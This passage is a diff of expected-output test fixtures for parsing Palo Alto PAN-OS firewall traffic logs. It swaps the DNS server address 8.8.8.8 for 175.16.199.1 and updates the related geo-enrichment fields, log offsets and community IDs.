 "panw.panos.destination.zone": "untrust",
 "panw.panos.endreason": "aged-out",
 "panw.panos.flow_id": "24211",
- "panw.panos.network.nat.community_id": "1:p8DU1xLXG63f/3s/r6ZKJcQo9u8=",
+ "panw.panos.network.nat.community_id": "1:TgKht4IY3bXV7bhl2uE8yxyTVxc=",
 "panw.panos.ruleset": "new_outbound_from_trust",
 "panw.panos.sequence_number": 32091177,
 "panw.panos.source.interface": "ethernet1/2",
@@ -7258,14 +7066,14 @@
 "PA-220"
 ],
 "related.ip": [
+ "175.16.199.1",
 "192.168.1.63",
- "192.168.15.224",
- "8.8.8.8"
+ "192.168.15.224"
 ],
 "rule.name": "new_outbound_from_trust",
 "server.bytes": 169,
- "server.ip": "8.8.8.8",
- "server.nat.ip": "8.8.8.8",
+ "server.ip": "175.16.199.1",
+ "server.nat.ip": "175.16.199.1",
 "server.nat.port": 53,
 "server.packets": 1,
 "server.port": 53,
@@ -7290,17 +7098,18 @@
 "client.nat.port": 5787,
 "client.packets": 1,
 "client.port": 8781,
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 128,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
- "destination.nat.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
+ "destination.nat.ip": "175.16.199.1",
 "destination.nat.port": 53,
 "destination.packets": 1,
 "destination.port": 53,
@@ -7314,7 +7123,7 @@
 "event.end": "2018-11-30T16:09:14.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "event.outcome": "success",
 "event.start": "2018-11-30T16:09:14.000-02:00",
 "event.timezone": "-02:00",
@@ -7326,12 +7135,12 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.nat_translated": true,
- "log.offset": 30692,
+ "log.offset": 31072,
 "network.application": "dns",
 "network.bytes": 208,
 "network.community_id": [
- "1:8CDWB7X3kkKjoV2bprSLSQY1py4=",
- "1:bU3nBIz+M3cDoPKg8azcJgVx+8Q="
+ "1:4kMe7BSg1jmAu9marx8zCErWXnE=",
+ "1:IG1vmXIXr9XMoOn0ZR3Jpjzb/GQ="
 ],
 "network.direction": "outbound",
 "network.packets": 2,
@@ -7348,12 +7157,12 @@
 "observer.vendor": "Palo Alto Networks",
 "panw.panos.action": "allow",
 "panw.panos.destination.interface": "ethernet1/1",
- "panw.panos.destination.nat.ip": "8.8.8.8",
+ "panw.panos.destination.nat.ip": "175.16.199.1",
 "panw.panos.destination.nat.port": 53,
 "panw.panos.destination.zone": "untrust",
 "panw.panos.endreason": "aged-out",
 "panw.panos.flow_id": "24253",
- "panw.panos.network.nat.community_id": "1:bU3nBIz+M3cDoPKg8azcJgVx+8Q=",
+ "panw.panos.network.nat.community_id": "1:4kMe7BSg1jmAu9marx8zCErWXnE=",
 "panw.panos.ruleset": "new_outbound_from_trust",
 "panw.panos.sequence_number": 32091178,
 "panw.panos.source.interface": "ethernet1/2",
@@ -7368,14 +7177,14 @@
 "PA-220"
 ],
 "related.ip": [
+ "175.16.199.1",
 "192.168.1.63",
- "192.168.15.224",
- "8.8.8.8"
+ "192.168.15.224"
 ],
 "rule.name": "new_outbound_from_trust",
 "server.bytes": 128,
- "server.ip": "8.8.8.8",
- "server.nat.ip": "8.8.8.8",
+ "server.ip": "175.16.199.1",
+ "server.nat.ip": "175.16.199.1",
 "server.nat.port": 53,
 "server.packets": 1,
 "server.port": 53,
@@ -7400,17 +7209,18 @@
 "client.nat.port": 12342,
 "client.packets": 1,
 "client.port": 16788,
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 181,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
- "destination.nat.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
+ "destination.nat.ip": "175.16.199.1",
 "destination.nat.port": 53,
 "destination.packets": 1,
 "destination.port": 53,
@@ -7424,7 +7234,7 @@
 "event.end": "2018-11-30T16:09:14.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "event.outcome": "success",
 "event.start": "2018-11-30T16:09:14.000-02:00",
 "event.timezone": "-02:00",
@@ -7436,12 +7246,12 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.nat_translated": true,
- "log.offset": 31139,
+ "log.offset": 31529,
 "network.application": "dns",
 "network.bytes": 253,
 "network.community_id": [
- "1:ScmRIn+bxqoJafQfJfEaH/CdCjE=",
- "1:vnb4ttnFy2i39tg89p3jkGs6eDg="
+ "1:NpUjkT7dIbMpW4JcNZFZad7+YTk=",
+ "1:g2w1ngDHewEU39cV0kn/LLmYUbE="
 ],
 "network.direction": "outbound",
 "network.packets": 2,
@@ -7458,12 +7268,12 @@
 "observer.vendor": "Palo Alto Networks",
 "panw.panos.action": "allow",
 "panw.panos.destination.interface": "ethernet1/1",
- "panw.panos.destination.nat.ip": "8.8.8.8",
+ "panw.panos.destination.nat.ip": "175.16.199.1",
 "panw.panos.destination.nat.port": 53,
 "panw.panos.destination.zone": "untrust",
 "panw.panos.endreason": "aged-out",
 "panw.panos.flow_id": "24221",
- "panw.panos.network.nat.community_id": "1:vnb4ttnFy2i39tg89p3jkGs6eDg=",
+ "panw.panos.network.nat.community_id": "1:NpUjkT7dIbMpW4JcNZFZad7+YTk=",
 "panw.panos.ruleset": "new_outbound_from_trust",
 "panw.panos.sequence_number": 32091179,
 "panw.panos.source.interface": "ethernet1/2",
@@ -7478,14 +7288,14 @@
 "PA-220"
 ],
 "related.ip": [
+ "175.16.199.1",
 "192.168.1.63",
- "192.168.15.224",
- "8.8.8.8"
+ "192.168.15.224"
 ],
 "rule.name": "new_outbound_from_trust",
 "server.bytes": 181,
- "server.ip": "8.8.8.8",
- "server.nat.ip": "8.8.8.8",
+ "server.ip": "175.16.199.1",
+ "server.nat.ip": "175.16.199.1",
 "server.nat.port": 53,
 "server.packets": 1,
 "server.port": 53,
@@ -7510,17 +7320,18 @@
 "client.nat.port": 18729,
 "client.packets": 1,
 "client.port": 45307,
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 121,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
- "destination.nat.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
+ "destination.nat.ip": "175.16.199.1",
 "destination.nat.port": 53,
 "destination.packets": 1,
 "destination.port": 53,
@@ -7534,7 +7345,7 @@
 "event.end": "2018-11-30T16:09:14.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "event.outcome": "success",
 "event.start": "2018-11-30T16:09:14.000-02:00",
 "event.timezone": "-02:00",
@@ -7546,12 +7357,12 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.nat_translated": true,
- "log.offset": 31588,
+ "log.offset": 31988,
 "network.application": "dns",
 "network.bytes": 197,
 "network.community_id": [
- "1:71/qcXOmOV3sXCqZ1T6JVPlE9y8=",
- "1:eupsSNkv67+oInX/FQ2hHpUMyR8="
+ "1:qSvFitPk6ZvC6N3gLeZpuL1qqCE=",
+ "1:yzXWvS3fpaPzwrvGsYmztnc8QW0="
 ],
 "network.direction": "outbound",
 "network.packets": 2,
@@ -7568,12 +7379,12 @@
 "observer.vendor": "Palo Alto Networks",
 "panw.panos.action": "allow",
 "panw.panos.destination.interface": "ethernet1/1",
- "panw.panos.destination.nat.ip": "8.8.8.8",
+ "panw.panos.destination.nat.ip": "175.16.199.1",
 "panw.panos.destination.nat.port": 53,
 "panw.panos.destination.zone": "untrust",
 "panw.panos.endreason": "aged-out",
 "panw.panos.flow_id": "24310",
- "panw.panos.network.nat.community_id": "1:71/qcXOmOV3sXCqZ1T6JVPlE9y8=",
+ "panw.panos.network.nat.community_id": "1:qSvFitPk6ZvC6N3gLeZpuL1qqCE=",
 "panw.panos.ruleset": "new_outbound_from_trust",
 "panw.panos.sequence_number": 32091180,
 "panw.panos.source.interface": "ethernet1/2",
@@ -7588,14 +7399,14 @@
 "PA-220"
 ],
 "related.ip": [
+ "175.16.199.1",
 "192.168.1.63",
- "192.168.15.224",
- "8.8.8.8"
+ "192.168.15.224"
 ],
 "rule.name": "new_outbound_from_trust",
 "server.bytes": 121,
- "server.ip": "8.8.8.8",
- "server.nat.ip": "8.8.8.8",
+ "server.ip": "175.16.199.1",
+ "server.nat.ip": "175.16.199.1",
 "server.nat.port": 53,
 "server.packets": 1,
 "server.port": 53,
@@ -7621,17 +7432,9 @@
 "client.packets": 6,
 "client.port": 52520,
 "destination.address": "23.52.174.25",
- "destination.as.number": 20940,
- "destination.as.organization.name": "Akamai International B.V.",
+ "destination.as.number": 35994,
+ "destination.as.organization.name": "Akamai Technologies, Inc.",
 "destination.bytes": 1246,
- "destination.geo.city_name": "San Antonio",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 29.4551,
- "destination.geo.location.lon": -98.6498,
- "destination.geo.region_iso_code": "US-TX",
- "destination.geo.region_name": "Texas",
 "destination.ip": "23.52.174.25",
 "destination.nat.ip": "23.52.174.25",
 "destination.nat.port": 80,
@@ -7659,7 +7462,7 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.nat_translated": true,
- "log.offset": 32037,
+ "log.offset": 32447,
 "network.application": "ocsp",
 "network.bytes": 1927,
 "network.community_id": [
@@ -7733,17 +7536,18 @@
 "client.nat.port": 2722,
 "client.packets": 1,
 "client.port": 8503,
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
+ "destination.address": "175.16.199.1",
 "destination.bytes": 315,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
- "destination.nat.ip": "8.8.8.8",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
+ "destination.nat.ip": "175.16.199.1",
 "destination.nat.port": 53,
 "destination.packets": 1,
 "destination.port": 53,
@@ -7757,7 +7561,7 @@
 "event.end": "2018-11-30T16:09:14.000-02:00",
 "event.kind": "event",
 "event.module": "panw",
- "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+ "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
 "event.outcome": "success",
 "event.start": "2018-11-30T16:09:13.000-02:00",
 "event.timezone": "-02:00",
@@ -7769,12 +7573,12 @@
 "fileset.name": "panos",
 "input.type": "log",
 "labels.nat_translated": true,
- "log.offset": 32523,
+ "log.offset": 32933,
 "network.application": "dns",
 "network.bytes": 394,
 "network.community_id": [
- "1:5CL0nRdjk2Nab0PzB6vfyC1FbtI=",
- "1:hxrz+dYE5XEf60JMlFz6JKWD6Ek="
+ "1:+dAjIg3ed8rxAdZqVmInBcFaH1Y=",
+ "1:WVlFLy1ZPgggGkD86Ln70kG53+s="
 ],
 "network.direction": "outbound",
 "network.packets": 2,
@@ -7791,12 +7595,12 @@
 "observer.vendor": "Palo Alto Networks",
 "panw.panos.action": "allow",
 "panw.panos.destination.interface": "ethernet1/1",
- "panw.panos.destination.nat.ip": "8.8.8.8",
+ "panw.panos.destination.nat.ip": "175.16.199.1",
 "panw.panos.destination.nat.port": 53,
 "panw.panos.destination.zone": "untrust",
 "panw.panos.endreason": "aged-out",
 "panw.panos.flow_id": "24201",
- "panw.panos.network.nat.community_id": "1:hxrz+dYE5XEf60JMlFz6JKWD6Ek=",
+ "panw.panos.network.nat.community_id": "1:+dAjIg3ed8rxAdZqVmInBcFaH1Y=",
 "panw.panos.ruleset": "new_outbound_from_trust",
 "panw.panos.sequence_number": 32091182,
 "panw.panos.source.interface": "ethernet1/2",
@@ -7811,14 +7615,14 @@
 "PA-220"
 ],
 "related.ip": [
+ "175.16.199.1",
 "192.168.1.63",
- "192.168.15.224",
- "8.8.8.8"
+ "192.168.15.224"
 ],
 "rule.name": "new_outbound_from_trust",
 "server.bytes": 315,
- "server.ip": "8.8.8.8",
- "server.nat.ip": "8.8.8.8",
+ "server.ip": "175.16.199.1",
+ "server.nat.ip": "175.16.199.1",
 "server.nat.port": 53,
 "server.packets": 1,
 "server.port": 53,
@@ -7843,17 +7647,18 @@ "client.nat.port": 6674, "client.packets": 1, "client.port": 6910, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 130, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -7867,7 +7672,7 @@ "event.end": "2018-11-30T16:09:14.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:14.000-02:00", "event.timezone": "-02:00", @@ -7879,12 +7684,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 32970, + "log.offset": 33390, "network.application": "dns", "network.bytes": 212, "network.community_id": [ - "1:3cIrQ2yt0QUupDVmbBJXH54+2pA=", - "1:8cb9oPS9OJnzqGAkowgmRpiqmJU=" + "1:DdftFWHUV6zFdIItu/clDOeJp2w=", + "1:cEWHWAc2Xquu42JBj+eNL8udND0=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -7901,12 +7706,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24130", - "panw.panos.network.nat.community_id": "1:8cb9oPS9OJnzqGAkowgmRpiqmJU=", + "panw.panos.network.nat.community_id": "1:cEWHWAc2Xquu42JBj+eNL8udND0=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091183, "panw.panos.source.interface": "ethernet1/2", @@ -7921,14 +7726,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 130, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, @@ -7954,17 +7759,7 @@ "client.packets": 5, "client.port": 52475, "destination.address": "54.230.5.228", - "destination.as.number": 16509, - "destination.as.organization.name": "Amazon.com, Inc.", "destination.bytes": 288, - "destination.geo.city_name": "Seattle", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 47.54, - "destination.geo.location.lon": -122.3032, - "destination.geo.region_iso_code": "US-WA", - "destination.geo.region_name": "Washington", "destination.ip": "54.230.5.228", "destination.nat.ip": "54.230.5.228", "destination.nat.port": 443, @@ -7992,7 +7787,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 33417, + "log.offset": 33847, "network.application": "incomplete", "network.bytes": 642, "network.community_id": [ 
@@ -8066,17 +7861,18 @@ "client.nat.port": 22408, "client.packets": 1, "client.port": 14342, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 149, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -8090,7 +7886,7 @@ "event.end": "2018-11-30T16:09:14.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:14.000-02:00", "event.timezone": "-02:00", @@ -8102,12 +7898,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 33886, + "log.offset": 34316, "network.application": "dns", "network.bytes": 225, "network.community_id": [ - "1:5IHTDvzRd4yPLPdpI4ErHcRK4/w=", - "1:uTxp5xDc9k43Sc1xNxNrsxzfM/I=" + "1:TP97MYHMqjGEwqLRwc1YYh3ZNh8=", + "1:cTo0xm7D3/5fRCbdwwuwUxi722g=" ], "network.direction": "outbound", "network.packets": 2, 
@@ -8124,12 +7920,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "untrust", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "24108", - "panw.panos.network.nat.community_id": "1:5IHTDvzRd4yPLPdpI4ErHcRK4/w=", + "panw.panos.network.nat.community_id": "1:TP97MYHMqjGEwqLRwc1YYh3ZNh8=", "panw.panos.ruleset": "new_outbound_from_trust", "panw.panos.sequence_number": 32091185, "panw.panos.source.interface": "ethernet1/2", @@ -8144,14 +7940,14 @@ "PA-220" ], "related.ip": [ + "175.16.199.1", "192.168.1.63", - "192.168.15.224", - "8.8.8.8" + "192.168.15.224" ], "rule.name": "new_outbound_from_trust", "server.bytes": 149, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -8176,17 +7972,18 @@ "client.nat.port": 27899, "client.packets": 1, "client.port": 48197, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 202, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -8200,7 +7997,7 @@ "event.end": "2018-11-30T16:09:15.000-02:00", "event.kind": "event", "event.module": "panw", - "event.original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "event.original": "Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "event.outcome": "success", "event.start": "2018-11-30T16:09:15.000-02:00", "event.timezone": "-02:00", @@ -8212,12 +8009,12 @@ "fileset.name": "panos", "input.type": "log", 